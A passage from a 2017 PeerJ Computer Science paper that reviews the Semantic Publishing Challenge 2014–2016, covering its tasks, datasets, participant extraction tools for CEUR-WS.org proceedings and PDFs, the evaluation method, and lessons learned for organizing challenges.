10.7717/peerj-cs.105 10/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 2016 edition tasks. The tasks of the 2016 edition were designed to ensure continuity and to allow previous participants to use and refine their tools. In particular, Task 1 was unchanged except for some minor details on queries. Task 2 was still on PDF information extraction but queries were slightly changed: considering the interest and results of the participants in the past, we did not include citations any more. Rather, we added some queries on the identification of the structural components of the papers (table of contents, captions, figures and tables) and maintained queries on funding agencies and projects. In total, we had ten queries in 2016 as well. Task 3 remained the same but it was repurposed. Instead of only aiming for cross-dataset links between the dataset produced by the Task 1 winners of the previous edition of the challenge and other, external datasets, Task 3 now focused on interlinking the datasets produced by the winners of Task 1 and Task 2 of the 2015 edition. Thus, the task aimed not only at cross-dataset but also at cross-task links: the goal was to link entities identified in the CEUR-WS.org website with the same entities that were extracted from the proceedings papers. Moreover, the number of external datasets was reduced. Input: training and evaluation datasets In this section we give an overview of the datasets used for the above mentioned tasks. These datasets were incrementally refined and, as discussed below in ‘Dataset continuity’, some valuable indications can be taken from their analysis. For each task, and for each year, we published two datasets: (i) a training dataset (TD) on which the participants could test and train their extraction tools and (ii) an evaluation dataset (ED) made available a few days before the final submission and used as input for the final evaluation. Training and evaluation dataset for task 1. The CEUR-WS.org workshop proceedings volumes served as the source for selecting the training and evaluation datasets of Task 1 in all challenge editions. In this data source, which included data spanning over 20 years, workshop proceedings volumes were represented in different formats and at different levels of encoding quality and semantics. An HTML4 main index page (CEUR-WS, http://ceur-ws.org/) links to all workshop proceedings volumes, which have HTML tables of contents and contain PDF or PostScript full texts. A mixture of different HTML formats (no semantic markup at all, different versions of microformats, RDFa) were chosen for both the training and evaluation datasets. The training dataset comprised all volumes of several workshop series, including, e.g., the Linked Data on the Web workshop at the WWW conference, and all workshops of some conferences, e.g., of several editions of ESWC. In 2014 and 2015, the evaluation dataset was created by adding further workshops on top of the training dataset. To support the evolution of extraction tools, the training datasets of 2015 and 2016 were based on the unions of the training and evaluation datasets of the previous years. In 2015 and 2016, the Task 1 dataset of the previous year served as an input to Task 3. Training and evaluation dataset for task 2. In 2014, the datasets for Task 2 included XML files encoded in JATS, (http://jats.nlm.nih.gov/) and TaxPub, (https://github.com/plazi/ TaxPub), an official extension of JATS customized for taxonomic treatments (Catapano, Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 11/47 https://peerj.com http://ceur-ws.org/ http://jats.nlm.nih.gov/ https://github.com/plazi/TaxPub https://github.com/plazi/TaxPub http://dx.doi.org/10.7717/peerj-cs.105 2010). The training dataset consisted of 150 files from 15 journals, while the evaluation dataset included 400 papers and was a superset of the training dataset. In 2015, we switched to PDF information extraction: the training dataset included 100 papers taken from some of the workshops analyzed in Task 1, while the evaluation dataset included 200 papers from randomly selected workshops (uniform to the training dataset). In 2016, we reduced the number of papers increasing the cases for each query. Thus, we included 50 PDF papers in the training and 40 in the evaluation dataset. Again, the papers were distributed in the same way and used different styles for headers, acknowledgments and structural components. Training and evaluation dataset for task 3. The training dataset for Task 3 consists of the CEUR-WS.org dataset produced by the 2014 winning tool of Task 1 (2014 CEUR-WS dataset, https://github.com/ceurws/lod/blob/master/data/ceur-ws.ttl), COLINDA (http://www.colinda.org/), DBLP (http://dblp.l3s.de/dblp++.php), Lancet (http://www.semanticlancet.eu/), SWDF (http://data.semanticweb.org/), and Springer LD (http://lod.springer.com/) in 2015 and the CEUR-WS.org datasets produced by the 2015 winning tools of Task 1 (2015 CEUR-WS Task 1 dataset, http://rml.io/data/ SPC2016/CEUR-WS/CEUR-WStask1.rdf.gz) and Task 2 (2015 CEUR-WS Task 2 dataset, http://rml.io/data/SPC2016/CEUR-WS/CEUR-WStask2.rdf.gz), of COLINDA, DBLP, and Springer LD in 2016. Output: solutions and datasets produced There were four distinct solutions in total for Task 1 during the three editions of the challenge, eight distinct solutions in total for Task 2 and none for Task 3 during the last two editions. All solutions for each task are briefly summarized here. Task 1. There were four distinct solutions proposed to address Task 1 in 2014 and 2015 editions of the challenge. Three participated in both editions, whereas the fourth solution participated only in 2015. All solutions are briefly introduced here and summarized in Tables 3–7. Table 3 provides details about the methodologies, approach and implementation each solution followed. Table 4 summarizes the model and vocabularies/ontologies each solution used (both for Task 1 and Task 2), whereas Table 7 provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for Task 1 and Task 2). Last, Table 5 summarizes the data model each solution considered and Table 6 the number of instances extracted and annotated per concept for each solution. Solution 1.1. Kolchin et al. (2015) and Kolchin & Kozlov (2014) presented a case-specific crawling based approach for addressing Task 1. It relies on an extensible template- dependent crawler that uses sets of special predefined templates based on XPath and regular expressions to extract the content from HTML and convert it in RDF. The RDF is then processed to merge resources using fuzzy-matching. The use of the crawler turns the system tolerant to invalid HTML pages. This solution improved its precision in 2015 as well the richness of the data model. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 12/47 https://peerj.com https://github.com/ceurws/lod/blob/master/data/ceur-ws.ttl http://www.colinda.org/ http://dblp.l3s.de/dblp++.php http://www.semanticlancet.eu/ http://data.semanticweb.org/ http://lod.springer.com/ http://rml.io/data/SPC2016/CEUR-WS/CEUR-WStask1.rdf.gz http://rml.io/data/SPC2016/CEUR-WS/CEUR-WStask1.rdf.gz http://rml.io/data/SPC2016/CEUR-WS/CEUR-WStask2.rdf.gz http://dx.doi.org/10.7717/peerj-cs.105 Table 3 Task 1 solutions: their primary analysis methods, methodologies, implementations basis and evaluation results. Solution 1.1 Solution 1.2 Solution 1.3 Solution 1.4 Publications Kolchin et al. (2015) Heyvaert et al. (2015) Ronzano et al. (2015) Milicka & Burget (2015) Kolchin & Kozlov (2014) Dimou et al. (2014) Ronzano, Del Bosque & Saggion (2014) – Primary analysis structure-based X X syntactic-based X X linguistic-based X layout-based X Methodology method Crawling Generic solution for abstracted mappings Linguistic and structural analysis Visual layout multi-aspect content analysis case-specific X X(partly) X(partly) template-based X X NLP/NER X X Implementation basis n/a RML GATE FITLayout language Python Java Java Java, HTML rules language XPath RML, CSS JAPE HTML,CSS code/rule separation X X regular expressions X X X X external services X X open source X X X license MIT MIT – GPL-3.0 Evaluation precision improvement 11.1% 11.4% 10.7% – recall improvement 11.3% 11.3% 10.9% – best performing X(2014) X(2015) most innovative X(2014) X(2015) Solution 1.2. Heyvaert et al. (2015) and Dimou et al. (2014) exploited a generic tool for generating RDF data from heterogeneous data. It uses the RDF Mapping Language (RML http://rml.io) to define how data extracted from CEUR-WS.org Web pages should be semantically annotated. RML extends R2RML (https://www.w3.org/TR/r2rml/) to express mapping rules from heterogeneous data to RDF. CSS3 selectors (CSS3, https://www.w3.org/TR/selectors/) are considered to extract the data from the HTML pages. The RML mapping rules are parsed and executed by the RML Processor (https://github.com/RMLio/RML-Mapper). In 2015 the solution reconsidered its data model and was extended to validate both the mapping documents and the final RDF, resulting in an overall improved quality dataset. Solution 1.3. Ronzano et al. (2015) and Ronzano, Del Bosque & Saggion (2014) designed a case-specific solution that relies on chunk-based and sentence-based Support Vector Machine (SVM) classifiers which are exploited to semantically characterize parts of Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 13/47 https://peerj.com http://rml.io https://www.w3.org/TR/r2rml/ https://www.w3.org/TR/selectors/ https://github.com/RMLio/RML-Mapper http://dx.doi.org/10.7717/peerj-cs.105 Table 4 Task 1 and 2 solutions: the vocabularies used to annotate the data. Sol 1.1 Sol 1.2 Sol 1.3 Sol 1.4 Sol 2.1 Sol 2.2 Sol 2.3 Sol 2.4 Sol 2.5 Sol 2.6 Sol 2.7 Sol 2.8 bibo1 X X X X X co2 X X DBO3 X X X X X DC4 X X X X X X X DCterms5 X X X X X event6 X X FOAF7 X X X X X X X X schema8 X X SKOS9 X SPAR10 X X X X X X BiRO X X CiTO X DoCO X X X FaBiO X X X X X FRAPO X X FRBR X PRO X X X X SWC11 X X X SWRC12 X X X X X X timeline13 X X vcard14 X X X custom X X X X Notes. 1bibo, http://purl.org/ontology/bibo/. 2Collections Ontology, http://purl.org/co/. 3DBO, http://dbpedia.org/ontology/. 4DC, http://purl.org/dc/elements/1.1/. 5DCTerms, http://purl.org/dc/terms/. 6event ontology, http://purl.org/NET/c4dm/event.owl#. 7FOAF, http://xmlns.com/foaf/0.1/. 8Schema.org, http://schema.org. 9SKOS, http://www.w3.org/2004/02/skos/core#. 10SPAR, http://www.sparontologies.net/. 11SWC, http://data.semanticweb.org/ns/swc/ontology#. 12SWRC, http://swrc.ontoware.org/ontology#. 13timeline ontology, http://purl.org/NET/c4dm/timeline.owl#. 14VCard, http://www.w3.org/2006/vcard/ns#. CEUR-WS.org proceedings textual contents. Thanks to a pipeline of text analysis components based on the GATE Text Engineering Framework (GATE, https://gate.ac.uk/), each HTML page is characterized by structural and linguistic features: these features are then exploited to train the classifiers on the ground-truth provided by the subset of CEUR-WS.org proceedings with microformat annotations. A heuristic-based annotation sanitizer is applied to fix classifiers imperfections and interlink annotations. The produced dataset is also extended with information retrieved from external resources. Solution 1.4. Milicka & Burget (2015) presented an application of the FITLayout framework (http://www.fit.vutbr.cz/~burgetr/FITLayout/). This solution participated Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 14/47 https://peerj.com http://purl.org/ontology/bibo/ http://purl.org/co/ http://dbpedia.org/ontology/ http://purl.org/dc/elements/1.1/ http://purl.org/dc/terms/ http://purl.org/NET/c4dm/event.owl# http://xmlns.com/foaf/0.1/ http://schema.org http://www.w3.org/2004/02/skos/core# http://www.sparontologies.net/ http://data.semanticweb.org/ns/swc/ontology# http://swrc.ontoware.org/ontology# http://purl.org/NET/c4dm/timeline.owl# http://www.w3.org/2006/vcard/ns# https://gate.ac.uk/ http://www.fit.vutbr.cz/~burgetr/FITLayout/ http://dx.doi.org/10.7717/peerj-cs.105 Table 5 Statistics about the model (Task 1—2014 and 2015 editions). Solution 1.1 Solution 1.2 Solution 1.3 Solution 1.4 Year 2014 2015 2014 2015 2014 2015 2015 Conferences swc:OrganizedEvent swc:OrganizedEvent swc:Event bibo:Conference swrc:Event swrc:Conference swrc:ConferenceEvent Workshops bibo:Workshop bibo:Workshop swc:Event bibo:Workshop swrc:Event swrc:Workshop swrc:Section Proceedings swrc:Proceedings bibo:Proceeding bibo:Volume bibo:Proceeding swrc:Proceedings swrc:Proceedings swrc:Proceedings Papers swrc:InProceedings swrc:InProceedings, foaf:Document bibo:Article swrc:InProceedings swrc:Publication swrc:Publication swc:Paper Persons foaf:Agent foaf:Person foaf:Person foaf:Person foaf:Person foaf:Person foaf:Person D im ou etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.105 15/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Table 6 Number of entities per concept for each solution (Task 1—2014 and 2015 editions). Solution 1.1 Solution 1.2 Solution 1.3 Solution 1.4 Year 2014 2015 2014 2015 2014 2015 2015 Conferences 21 46 46 5 47 Workshops 132 252 14 1,393 1,516 127 198 Proceedings 126 243 65 1,392 124 202 1,353 Papers 1,634 3,801 971 2,452 1,110 720 2,470 Persons 2,854 6,700 202 6,414 2,794 3,402 11,034 Table 7 Statistics about the produced dataset (Task 1—2014 and 2015 editions). Solution 1.1 Solution 1.2 Solution 1.3 Solution 1.4 Year 2014 2015 2014 2015 2014 2015 2015 dataset size 1.5 M 25 M 1.7 M 7.2 M 2.7 M 9.1 M 9.7 M # triples 32,088 177,752 14,178 58,858 60,130 62,231 79,444 # entities 4,770 11,428 1,258 11,803 9,691 11,656 19,090 # properties 60 46 43 23 45 48 23 # classes 8 30 5 10 10 19 6 in the Semantic Publishing Challenge only in 2015. It combines different page analysis methods, i.e., layout analysis and visual and textual feature classification to analyze the rendered pages, rather than their code. The solution is quite generic but requires domain/case-specific actions in certain phases (model building step). Task 2. There were eight distinct solutions proposed to address Task 2 in the 2015 and 2016 editions of the challenge. Three participated in both editions, three only in 2015 and two only in 2016. As the definition of Task 2 changed fundamentally from 2014 to 2015, the only solution submitted for Task 2 in 2014 (Bertin & Atanassova, 2014) is not comparable to the 2015 and 2016 solutions and therefore not discussed here. All solutions for Task 2—except for the one of 2014—are briefly introduced here and summarized in Tables 4, Tables 8–11. Tables 9 and 10 provide details about the methodologies and approach each solution followed. Table 11 summarizes details regarding the implementation and its components each solution employed to address Task 2. Table 4 summarizes the model and vocabularies/ontologies each solution used (both for Task 1 and Task 2), whereas Table 8 provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for Task 1 and Task 2). Solution 2.1. Tkaczyk & Bolikowski (2015) relied on CERMINE (http://cermine.ceon.pl/), an open source system for extracting structured metadata and references from scientific publications published as PDF files. It has a loosely captured architecture and a modular workflow based on supervised and unsupervised machine-learning techniques, which simplifies the systems adaptation to new document layouts and styles. It employs an enhanced Docstrum algorithm for page segmentation to obtain the document’s hierarchical structure, Support Vector Machines (SVM) to classify its zones, heuristics and regular Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 16/47 https://peerj.com http://cermine.ceon.pl/ http://dx.doi.org/10.7717/peerj-cs.105 Table 8 Statistics about the produced dataset (Task 2—2015 and 2016 editions). Sol 2.1 Sol 2.2 Sol 2.3 Sol 2.4 Sol 2.5 Sol 2.6 Sol 2.7 Sol 2.8 Year 2015 2015 2016 2016 2015 2015 2015 2016 2016 dataset size 2.6 M 1.5 M 285 184K 3.6 M 2.4 M 17 M 152 235 # triples 21,681 10,730 2,143 1,628 15,242 12,375 98,961 1,126 1,816 # entities 4,581 1,300 334 257 3,249 2,978 19,487 659 829 # properties 12 23 23 15 19 21 36 571 23 expressions for individual and Conditional Random Fields (CRF) for affiliation parsing and thus to identify organization, address and country in affiliation. Last, K-Means clustering was used for reference extraction to divide references zones into individual reference strings. Solution 2.2. Klampfl & Kern (2015) and Klampfl & Kern (2016) implemented a processing pipeline that analyzes a PDF document structure incorporating a diverse set of machine learning techniques. To be more precise, they employ unsupervised machine learning techniques (Merge-&-Split algorithm) to extract text blocks and supervised (Max Entropy and Beam search) to extend the document’s structure analysis and identify sections and captions. They combine the above with clustering techniques to obtain the article’s hier- archical table of content and classify blocks into different meta-data categories. Heuristics are applied to detect the reference section and sequence classification to categorize the tokens of individual references to strings. Last, Named Entity Recognition (NER) is used to extract references to grants, funding agencies, projects, figure and table captions. Solution 2.3. Nuzzolese, Peroni & Reforgiato Recupero (2015) and Nuzzolese, Peroni & Recupero (2016) relied on the Metadata And Citations Jailbreaker (MACJa IPA) in 2015, which was extended to the Article Content Miner (ACM) in 2016. The tool integrates hybrid techniques based on Natural Language Processing (NLP, Combinatory Categorial Grammar, Discourse Representation Theory, Linguistic Frames), Discourse Reference Extraction and Linking, and Topic Extraction. It also employs heuristics to exploit existing lexical resources and gazetteers to generate representation structures. Moreover, it incorporates FRED (http://wit.istc.cnr.it/stlab-tools/fred), a novel machine reader, and includes modules to query external services to enhance and validate data. Solution 2.4. Sateli & Witte (2015) and Sateli & Witte (2016), relying on LODeXporter (http://www.semanticsoftware.info/lodexporter), proposed an iterative rule-based pattern matching approach. The system is composed of two modules: (i) a text mining pipeline based on the GATE framework to extract structural and semantic entities. It leverages existing NER-based text mining tools to extract both structural and semantic elements, employing post-processing heuristics to detect or correct the authors affiliations in a fuzzy manner, and (ii) a LOD exporter, to translate the document annotations into RDF according to custom rules. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 17/47 https://peerj.com http://wit.istc.cnr.it/stlab-tools/fred http://www.semanticsoftware.info/lodexporter http://dx.doi.org/10.7717/peerj-cs.105 Table 9 Task 2 solutions: their primary analysis methods, their methodologies (i) in general as well as with respect to (ii) extraction, (iii) text recognition and (iv) use of machine learning techniques, and evaluation results. Solution 2.1 Solution 2.2 Solution 2.3 Solution 2.4 Solution 2.5 Solution 2.6 Solution 2.7 Solution 2.8 Publications Tkaczyk & Bolikowski (2015) Klampfl & Kern (2016) Nuzzolese, Peroni & Recupero (2016) Sateli & Witte (2016) Kovriguina et al. (2015) Ronzano et al. (2015) Ahmad, Afzal & Qadir (2016) Ramesh et al. (2016) – Klampfl & Kern (2015) Nuzzolese, Peroni & Reforgiato Recupero (2015) Sateli & Witte (2015) – – – – Primary Analysis structure-based X X X X X linguistic-based X X X X X X presentation-based X X X X Methodology workflow parallel pipelines parallel pipelines single pipeline iterative approach single pipeline single pipeline single pipeline layered approach external services X X X X Extraction PDF-to-XML X X X(2016) X X PDF-to-HTML X PDF-to-text X X(2015) X X Machine Learning supervised X X X X X X unsupervised X X CRF X X X Text recognition NLP/NER X X X X X heuristics X X X X X X X X regEx X X X X X X X Evaluation best performing X(2015) X(2016) most innovative X(2016) X(2015) D im ou etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.105 18/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Table 10 Task 2 solutions: how they address different subtasks to accomplish Task 2. Information to extract Solution 2.1 Solution 2.2 Solution 2.3 Solution 2.4 Solution 2.5 Solution 2.6 Solution 2.7 Solution 2.8 document structure enhanced docstrum max entropy, merge & split, clustering NLP to break the text down in sec- tions & sentences span between Gazetteer’s seg- ment headers font characteris- tics, text position rule-based itera- tive PDF analysis heuristics on ti- tles, capital-case and style level I & II CRF fragments’ classification SVM supervised ML Stanford CoreNLP & NLTK Gazetteer font-based blocks & sorting structural fea- tures, chunk-& sentence-based SVM pattern- matching level II CRF authors SVM (Lib- SVM) unsupervised ML & classification heuristics, NER, CoreNLP Gazetteer’s per- son first names e-mail 1st part frequent patterns & string compar- ison layout info, AN- NIE, external re- pos from plain text: start/end identi- fiers return char- acter level III CRF affiliations CRF unsupervised ML & classification NER, statistical rules, patterns organizations names rules pat- terns e-mail 2nd part frequent patterns & string compar- ison ANNIE, external repos from plain text: start/end identi- fiers return char- acter level III CRF, af- filiation markers, POS, NER funding 7 NER, sequence classification ‘Acknowledg- ments’ section, regEx, number or identifier ‘Acknowledg- ments’ section, upper-initial word token or name of organi- zation ‘Acknowledg- ments’ section, string-matching: ‘support— fund— sponsor’, etc. manual JAPE grammars ‘Acknowledg- ments’ section, string matching: ‘the’...‘project’, etc. level II CRF references CRF geometrical block segmenta- tion ParseCit Cross- Ref hand-crafting rules for multiple cases Heuristics on ‘References’ sec- tion external services n/a level III CRF (even though n/a in 2016) ontologies 7 n/a match named entities to in- dexed ontologies root tokens of ontology names ‘Abstract’ stop- list of acronyms JAPE grammars n/a n/a tables & fig- ures n/a max entropy, merge & split 7 ‘Table’— ‘Figure— Fig’ trigger words n/a n/a heuristics on captions, string matching level II CRF supplementary material n/a max entropy, merge & split 7 heuristics on links n/a n/a heuristics on links and string matching 7 Notes. n/a, stands for subtasks that were not required the year the solution participated in the challenge; 7, stands for subtasks that were not addressed by a certain solution. D im ou etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.105 19/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Table 11 Implementation details for Task 2 solutions. Solution 2.1 Solution 2.2 Solution 2.3 Solution 2.4 Solution 2.5 Solution 2.6 Solution 2.7 Solution 2.8 Implementation language C++ X Java X X X X X X X Python X X X PDF character extraction Apache PDFBox1 X X X iText2 X Poppler3 X PDFMiner4 X X PDFX5 X(2016) X X Xpdf6 X(2015) Intermediate representation HTML X JSON X text X X X X XML X(NLM JATS) X X X(NLM JATS) External components CrossRef API X X DBpedia Spotlight7 X X GATE X X X ANNIE8 X X FreeCite X X (continued on next page) D im ou etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.105 20/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Table 11 (continued) Solution 2.1 Solution 2.2 Solution 2.3 Solution 2.4 Solution 2.5 Solution 2.6 Solution 2.7 Solution 2.8 others GRMM9, LibSVM10, Mallet11 crfsuite12, OpenNLP13, ParsCit14, FRED, Stanford CoreNLP15, NLTK16, (Word- Net17, Ba- belNet18) DBpedia SPARQL end-point Grab spider19, Beautiful- Soup20 Bibsonomy21, FundRef22, EDITpad Pro23, Stanford NERTag- ger24, CRF++25, CoNLL26, JATS2RDF27 (Open Source) License AGPL-3.0 AGPL-3.0 not specified LGPL-3.028 MIT not specified not specified not specified Notes. 1Apache PDFBox, https://pdfbox.apache.org/. 2iText, http://itextpdf.com/. 3Poppler, https://poppler.freedesktop.org/. 4PDFMiner, http://www.unixuser.org/~euske/python/pdfminer/. 5PDFX, http://cs.unibo.it/save-sd/2016/papers/html/pdfx.cs.man.ac.uk. 6Xpdf, http://www.foolabs.com/xpdf/. 7DBpedia Spotlight, http://spotlight.dbpedia.org/. 8ANNIE, https://gate.ac.uk/sale/tao/splitch6.html. 9GRMM, http://mallet.cs.umass.edu/grmm/. 10LibSVM, https://www.csie.ntu.edu.tw/~cjlin/libsvm/. 11Mallet, http://mallet.cs.umass.edu/ 12crfsuite, http://www.chokkan.org/software/crfsuite/. 13OpenNLP, https://opennlp.apache.org/. 14ParsCit, http://wing.comp.nus.edu.sg/parsCit/. 15Stanford CoreNLP, http://stanfordnlp.github.io/CoreNLP/. 16NLTK, http://www.nltk.org/. 17WordNet, https://wordnet.princeton.edu/. 18BabelNet, http://babelnet.org/. 19Grab spider, http://grablib.org/. 20BeautifulSoup, http://www.crummy.com/software/BeautifulSoup/. 21Bibsonomy, http://www.bibsonomy.org/help/doc/api.html. 22FundRef, http://www.crossref.org/fundingdata/. 23EDITpad Pro, https://www.editpadpro.com/. 24Stanford NERTagger, http://nlp.stanford.edu/software/CRF-NER.shtml. 25CRF++, https://taku910.github.io/crfpp/. 26CoNLL, http://www.cnts.ua.ac.be/conll2000/chunking/. 27JATS2RDF, https://github.com/Klortho/eutils-org/wiki/JATS2RDF. 28LGPL-3.0, https://opensource.org/licenses/lgpl-3.0.html. D im ou etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.105 21/47 https://peerj.com https://pdfbox.apache.org/ http://itextpdf.com/ https://poppler.freedesktop.org/ http://www.unixuser.org/~euske/python/pdfminer/ http://cs.unibo.it/save-sd/2016/papers/html/pdfx.cs.man.ac.uk http://www.foolabs.com/xpdf/ http://spotlight.dbpedia.org/ https://gate.ac.uk/sale/tao/splitch6.html http://mallet.cs.umass.edu/grmm/ https://www.csie.ntu.edu.tw/~cjlin/libsvm/ http://mallet.cs.umass.edu/ http://www.chokkan.org/software/crfsuite/ https://opennlp.apache.org/ http://wing.comp.nus.edu.sg/parsCit/ http://stanfordnlp.github.io/CoreNLP/ http://www.nltk.org/ https://wordnet.princeton.edu/ http://babelnet.org/ http://grablib.org/ http://www.crummy.com/software/BeautifulSoup/ http://www.bibsonomy.org/help/doc/api.html http://www.crossref.org/fundingdata/ https://www.editpadpro.com/ http://nlp.stanford.edu/software/CRF-NER.shtml https://taku910.github.io/crfpp/ http://www.cnts.ua.ac.be/conll2000/chunking/ https://github.com/Klortho/eutils-org/wiki/JATS2RDF https://opensource.org/licenses/lgpl-3.0.html http://dx.doi.org/10.7717/peerj-cs.105 Solution 2.5. Kovriguina et al. (2015) relies on a rule-based and pattern matching approach, implemented in Python. Some external services are employed for improving the quality of the results (for instance, DBLP for validating authors data), as well as regular expressions, NLP methods and heuristics for HTML document style and standard bibliographic description. It also relies on an external tool to extract the plain text from PDFs. Solution 2.6. Ronzano et al. (2015) extended their framework used for Task 1 (and indicated as Solution 1.3 above) to extract data from PDF as well. Their linear pipeline includes text processing and entity recognition modules. It employs external services for mining PDF articles and heuristics to validate, refine, sanitize and normalize the data. Moreover, linguistic and structural analysis based on chunk-based & sentence-based SVM classifiers are employed, as well as enrichment by linking with external resources such as Bibsonomy, DBpedia Spotlight, DBLP, CrossRef, FundRef & FreeCite. Solution 2.7. Ahmad, Afzal & Qadir (2016) proposed a heuristic-based approach that uses a combination of tag-/rule-based and plain text information extraction techniques combined with generic heuristics and patterns (regular expressions). Their approach identifies patterns and rules from integrated formats. Solution 2.8. Ramesh et al. (2016) proposed a solution based on a sequential three-level Conditional Random Fields (CRF) supervised learning approach. Their approach follows the same feature list as Klampfl & Kern (2015). However, they extract PDF to an XML that conforms to the NLM JATS DTD, and generate RDF using an XSLT transformation tool dedicated for JATS. Tasks evaluation The evaluation of the submitted solutions was conducted in a transparent and objective way by measuring precision and recall. To perform the evaluation, we relied on (i) a gold standard and (ii) an evaluation tool which was developed to automate the procedure. Gold standard. The gold standard used for each task’s evaluation was generated manually. It consisted of a set of CSV files, each corresponding to the output of one of the queries used for the evaluation. Each file was built after checking the original sources—for instance HTML proceedings in case of Task 1 and PDF papers for Task 2—and looking for the output of the corresponding query; then, it was double-checked by the organizers. Furthermore, we also made available the gold standard to the participants (after their submission) so as they have the chance to report inaccuracies or inconsistencies. The final manually-checked version of the CSV files was used as input for the evaluation tool. Evaluation tool. The evaluation tool (SemPubEvaluator, https://github.com/angelobo/ SemPubEvaluator) compares the queries output provided by the participants (in CSV) against the gold standard and measures precision and recall. It was not made available to the participants after the 2014 edition, it was only made available after the 2015 edition, while it was made available already by the end of the training for the 2016 edition. This not Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 22/47 https://peerj.com https://github.com/angelobo/SemPubEvaluator https://github.com/angelobo/SemPubEvaluator http://dx.doi.org/10.7717/peerj-cs.105 only increased transparency but also allowed participants to refine their tools and address output imperfections, increasing this way the quality of their results. BEST PRACTICES FOR CHALLENGE ORGANIZATION In this section we discuss lessons learned from our experience in organizing the challenge and from (even unexpected) aspects that emerged while running the challenge. This section presents the lessons learned by looking at the solutions and data produced by the participants. We have grouped the lessons in categories for clarity, even though there is some overlap between them. Moreover, we validated our lessons learned with respect to other Semantic Web Evaluation Challenges, aiming to assess whether the lessons learned from the Semantic Publishing Challenge are transferable to their settings too. Besides the Semantic Publishing Challenge, another five challenges are organized in the frame of the Semantic Web Evaluation Challenges track at the ESWC Semantic Web Conference (cf. ‘State of the art on previously organized challenges’ section). To validate our challenge’s lessons learned, we conducted a survey, which we circulated among the organizers of the different Semantic Web Evaluation Challenges. One organizer per challenge filled in the questionnaire, providing representative answers for the respective challenge. Based on our survey’s results, we distill generic best practices that could be applied to similar events. Our lessons learned are outlined in this section, together with their validation based on the other challenges, as well as the corresponding distilled best practices. Lessons learned from defining tasks For the Semantic Publishing Challenge, it was difficult to define appealing tasks that bridge the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. Therefore, as discussed in ‘Semantic Publishing Challenge: 2014– 2016’, we refined the challenge’s tasks over the years according to the participants’ and organizers’ feedback. Task continuity Lesson. In the case of the Semantic Publishing Challenge, the first edition’s tasks were well perceived by potential participants and all of them had submissions. In the second edition (2015), in fact, the challenge was re-organized aiming at committing participants to re-submitting overall improved versions of their first edition’s submissions. Results were positive, as the majority of the participants of the first edition competed in the second one too. Therefore, task continuity is a key aspect of the Semantic Publishing Challenge, whose tasks in every year are broadly the same as the previous year’s edition, allowing participants to reuse their tools to adapt to the new call after some tuning. Validation. Three of the other four Semantic Web Evaluation Challenges have also been organized for several times. Table 1 shows the sustainability of the challenges considering recency and regularity of revisions over their lifetimes. Task continuity was embraced in all challenges by their participants, who not only resubmitted their solutions but also showed Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 23/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 continuously improved performance for all three challenges that had multiple editions, according to the organizers’ answers to our survey. Best practice. Tasks should be continued over the course of different editions. Nevertheless, they should be adjusted to pose new challenges that allow the authors of previous editions’ submissions to participate again in the challenge, thus offering them incentives to improve their solution, without excluding though new submissions at the same time. Distinct tasks Lesson. The initial goal of the Semantic Publishing Challenge was to explore a larger amount of information derived from CEUR-WS.org data and to offer a broad spectrum of alternative options for potential participants but, in retrospect, such heterogeneity proved to become a limitation. One of the main problems we faced was that some of the queries classified under the same task were cumbersome for the participants. For instance, in particular the submissions to Task 2—extraction from XML and PDF—showed an unexpectedly low performance. The main reason, in our opinion, is that the task was actually composed of two sub-tasks that required different tools and technologies: some queries required participants to basically map data from XML/PDF to RDF, while the others required additional processing of the content. Potential participants were discouraged to participate as they only felt competitive for the one and not for the other. A sharper distinction between tasks would have been more appropriate. In particular, it is important to separate tasks on plain data extraction from those on natural language processing and semantic analysis. Validation. According to the results of our survey, the Semantic Web Evaluation Challenges were designed with more than one task, more precisely, on average three tasks per challenge. In addition, all the individual tasks of the challenges were defined related to each other but independently at the same time, so that participants could take part in all or some of the tasks. Nevertheless, only two challenges had submissions for all tasks, while three out of five challenges lacked submissions only for one task. All challenges though, according to our survey, split the tasks considering the required competencies to accomplish them. Three out of five challenges even distinguish the training dataset used by each task to render the different tasks even more distinct. This contributes to enabling participation in certain tasks, while more challenging tasks or tasks of different nature are isolated. Thus, participants are not discouraged from participating if they are not competent for these parts; they can still participate in the tasks where they feel competent. Best practice. Splitting tasks with a clear and sharp distinction of the competencies required to accomplish them is a key success factor. Task should be defined taking into consideration the technology, tools and skills required to accomplish them. Participants involvement Lesson. One of the incentives of the challenge’s successive editions was to involve participants in the tasks’ definition, because potential tasks or obstacles might be identified more easily, if not intuitively, by them. However, even though we collected feedback from Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 24/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 previous years’ participants when designing the tasks, we noticed that such a preliminary phase was not given enough attention. Even though participants provided feedback immediately after the challenge was completed they were not equally eager to give feedback when they were asked just before the new edition was launched. Talking to participants, in fact, helped us to identify alternative tasks. Validation. It is common practice that challenge organizers ask for the participants’ feedback. According to our survey three out of four challenges (including Semantic Publishing Challenge) which had more than one submission took into consideration the participants’ feedback to adjust the tasks or to define new. Best practice. Exploiting participants feedback and involving them in the task definition creating a direct link between different editions is a key success factor. The participants’ early feedback can help to identify practical needs and correspondingly shape and adjust tasks. Tasks proposed or emerged 